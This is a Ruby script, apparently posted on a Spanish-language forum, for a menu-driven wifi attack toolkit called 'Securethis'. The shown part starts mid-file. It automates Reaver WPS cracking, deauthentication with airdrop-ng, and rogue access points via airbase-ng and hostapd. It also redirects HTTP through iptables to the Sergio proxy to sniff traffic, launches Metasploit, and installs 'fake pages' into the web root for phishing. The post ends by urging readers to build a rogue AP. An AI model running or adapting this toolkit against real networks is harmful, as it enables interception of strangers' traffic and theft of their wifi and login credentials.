puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end


La vidéo de explication
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Tendras mi configuracion dhcp dns.txt etc tambien sigiendo la vidéo  ;)

Hare mas explicacion la proxima vez con sergio proxy, no he visto el tiempo passar haciendo la vidéo y queria bien explicar todo.

Ahora no teneis excusas para nada  teneis que hacer bien esta tonta de rogue AP  :P